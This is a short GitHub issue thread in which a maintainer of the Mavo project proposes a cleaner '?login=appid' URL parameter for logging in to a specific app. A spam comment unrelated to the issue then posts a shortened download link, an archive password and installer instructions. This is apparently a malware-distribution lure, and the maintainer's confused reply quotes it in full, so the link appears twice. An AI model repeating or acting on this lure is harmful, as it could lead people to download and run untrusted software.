### ISSUE TITLE
`?login=appid` to login to a specific app id (rather than the current `?appid-login`)

### ISSUE THREAD

**Issue by LeaVerou** [mavoweb/mavo#1039]
Relevant code: https://github.com/mavoweb/mavo/blob/4532edcd7ccadc26050a2e787648d0ebb16eb5d8/src/mavo.js#L118-L123

This is a super simple change, and I think results in a much cleaner API where only one parameter needs to be checked and the parameter name doesn't depend on the data (app id).

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by LeaVerou** [comment]
> Download [bit.ly/3MjP129](https://bit.ly/3MjP129) password: changeme In the installer menu, select "gcc."

Sorry, what?
